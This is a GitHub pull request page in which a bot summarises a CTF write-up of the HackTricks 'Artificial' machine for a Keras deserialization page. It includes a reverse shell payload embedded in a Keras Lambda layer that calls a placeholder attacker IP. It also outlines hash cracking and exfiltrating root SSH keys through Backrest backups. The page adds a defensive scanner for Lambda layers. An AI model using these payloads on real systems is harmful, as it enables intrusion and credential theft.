@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

πŸ“ Source Information

🎯 Content Summary

Target context
- HTB machine: Artificial (Linux/Ubuntu 20.04). External services: 22/SSH, 80/HTTP (nginx 1.18.0). Backend app is Flask; authenticated users can upload TensorFlow models (.h5) and click “View Predictions”.

Recon
- Full port scan: only 22, 80 open:

nmap -p- -vvv --min-rate 10000 10.10.11.74
nmap -p 22,80 -sCV 10.10.11.74

22/tcp OpenSSH 8.2p1 Ubuntu 4ubuntu0.13

80/tcp nginx 1.18.0 (Ubuntu); redirect to http://artificial.htb...

🔧 Technical Details

Abusing Keras .h5 deserialization for code execution: Embed a malicious tf.keras.layers.Lambda in a model and save as .h5. When a server loads/builds the model or runs inference, your Python executes. Payload example for reverse shell:

def exploit(x):
  import os; os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'"); return x
Use exact target versions (e.g., TensorFlow 2.13.1, Python 3.8) to avoid serialization mismatches.

Credential pivot via app-local SQLite: Locate the app’s SQLite DB, dump user table, identify weak hashes (e.g., unsalted MD5), and crack with dictionaries. Reuse recovered passwords for su/SSH lateral movement.

Backrest data exfiltration via privileged backups: With Backrest admin, create a repository and a plan targeting sensitive paths (/root). Run backup, use Snapshot Browser and “Download files” to exfiltrate SSH keys (/root/.ssh/id...

🤖 Agent Actions

I analyzed the blog and repository, and found an existing, highly relevant page to update: src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md.

What I added:

  • A new practical exploitation section focused on TensorFlow-Keras HDF5 (.h5) Lambda RCE:
    • Minimal PoC code to craft a malicious .h5 with a reverse shell payload via tf.keras.layers.Lambda.
    • Notes on multiple execution trigger points (load/build/predict) and the need for idempotent payloads.
    • Version pinning and a simple Docker-based environment replication snippet (Python 3.8 + TF 2.13.1) to avoid serialization mismatches.
    • Validation tip using ICMP ping and tcpdump.
    • Defense-in-depth note reinforcing use of .keras with safe_mode=True and sandboxing.

Why this is the right place:

  • The page already covers Keras deserialization internals, Lambda RCE, and gadget hunting. The blog contributes a clear, end-to-end PoC and reliability guidance specifically for legacy .h5 usage, which was not yet illustrated with a concise exploit workflow.

What I did not add:

  • SQLite weak hash pivoting and Backrest exploitation details. These are separate techniques and would require different sections, but the instructions require not adding content in more than one file. Given the suggested section and the single-file constraint, I focused exclusively on the Keras model exploitation.

File modified:

  • src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md

References updated:

No new files were created.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
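
A defender-side check for the Lambda issue summarized in the PR description above, added here as an example (not code from the PR, the blog post, or HackTricks): it inspects the architecture JSON that legacy .h5 files keep in the root `model_config` attribute and flags Lambda layers before the model is ever loaded. The function names and both sample configs are assumptions constructed for illustration.

```python
import json

# Layer classes whose saved config carries serialized Python code.
CODE_BEARING_LAYERS = {"Lambda"}

def find_code_layers(model_config_json):
    """Return [(json_path, layer_name)] for every code-bearing layer in the config."""
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            cls = node.get("class_name")
            if isinstance(cls, str) and cls in CODE_BEARING_LAYERS:
                cfg = node.get("config")
                hits.append((path, cfg.get("name") if isinstance(cfg, dict) else None))
            for key, value in node.items():   # recurse: nested models, wrappers
                walk(value, f"{path}/{key}")
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")

    walk(json.loads(model_config_json), "")
    return hits

def model_config_from_h5(path):
    """Read the architecture JSON from an .h5 file without building the model."""
    import h5py  # third-party; only needed when scanning a real file
    with h5py.File(path, "r") as f:
        raw = f.attrs.get("model_config")
    if raw is None:
        return None  # weights-only file: no architecture to inspect
    return raw.decode("utf-8") if isinstance(raw, bytes) else raw

# Constructed sample (not from the page): a Lambda hidden inside a nested model.
SAMPLE = json.dumps({"class_name": "Sequential", "config": {"name": "outer", "layers": [
    {"class_name": "Dense", "config": {"name": "dense", "units": 4}},
    {"class_name": "Sequential", "config": {"name": "inner", "layers": [
        {"class_name": "Lambda", "config": {"name": "lambda",
         "function": ["<constructed placeholder>", None, None],
         "function_type": "lambda"}}]}}]}})

# Constructed sample with no code-bearing layers.
CLEAN_SAMPLE = json.dumps({"class_name": "Sequential", "config": {"name": "ok", "layers": [
    {"class_name": "Dense", "config": {"name": "dense", "units": 4}}]}})

if __name__ == "__main__":
    for path, name in find_code_layers(SAMPLE):
        print(f"REJECT upload: Lambda layer {name!r} at {path}")
```

An allowlist of the layer classes an application expects is stricter than this Lambda-only deny check, and it complements the `.keras` with `safe_mode=True` and sandboxing advice rather than replacing it.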

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2025/10/25/htb-artificial.html

Content Categories: Based on the analysis, this content was categorized under "Python -> Keras Model Deserialization RCE And Gadget Hunting".

Repository Maintenance:

  • MD Files Formatting: 901 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

@carlospolop
Collaborator Author

merge

@carlospolop carlospolop merged commit 1690e15 into master Nov 7, 2025
@carlospolop carlospolop deleted the update_HTB_Artificial__TensorFlow__h5_model_RCE___Backres_20251025_182452 branch November 7, 2025 08:13